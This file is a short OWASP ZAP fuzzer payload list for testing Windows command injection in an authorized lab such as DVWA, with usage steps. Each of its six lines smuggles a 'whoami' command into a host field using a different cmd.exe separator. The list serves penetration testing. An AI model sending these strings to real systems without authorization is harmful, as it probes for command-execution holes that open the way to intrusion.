# ============================================================================
# OWASP ZAP FUZZER PAYLOAD LIST
# Tool    : Command Injection Pattern Generator
# Author  : Offensive Team Zeta - ITSOLERA (PVT) LTD
# Created : 2026-02-20 18:30:04
# Target  : WINDOWS OS patterns
# Usage   : ZAP > Fuzzer > Payloads > Add > File > (this file)
# Mode    : Offline testing on authorized lab (e.g. DVWA) only
# WARNING : Use ONLY on authorized targets with written permission
# NOTE    : These are NON-EXECUTABLE string templates only
# ============================================================================

# HOW TO USE IN OWASP ZAP:
#   1. Start ZAP → Manual Explore → browse to localhost/DVWA
#   2. Find the target request in the History tab
#   3. Right-click the request → Attack → Fuzz
#   4. In the Fuzz dialog, highlight the injection point
#   5. Payloads → Add → Type: File → select this file
#   6. Click Start Fuzzer (authorized lab / DVWA ONLY)

# ============================================================================
# WINDOWS INJECTION PATTERNS
# ============================================================================
# [Separator: &] Windows ampersand — runs second command unconditionally (cmd.exe)
127.0.0.1 & whoami
# [Separator: &&] Windows AND — second command runs only if first succeeds
127.0.0.1 && whoami
# [Separator: ||] Windows OR — second command runs only if first fails
invalid_host || whoami
# [Separator: |] Windows pipe — stdout of first becomes stdin of second
127.0.0.1 | whoami
# [Separator: %0D%0A] CRLF encoded newline — cmd.exe treats CR+LF as command delimiter
127.0.0.1%0D%0Awhoami
# [Separator: ^&] Caret-escaped ampersand — cmd.exe caret is an escape character
127.0.0.1 ^& whoami

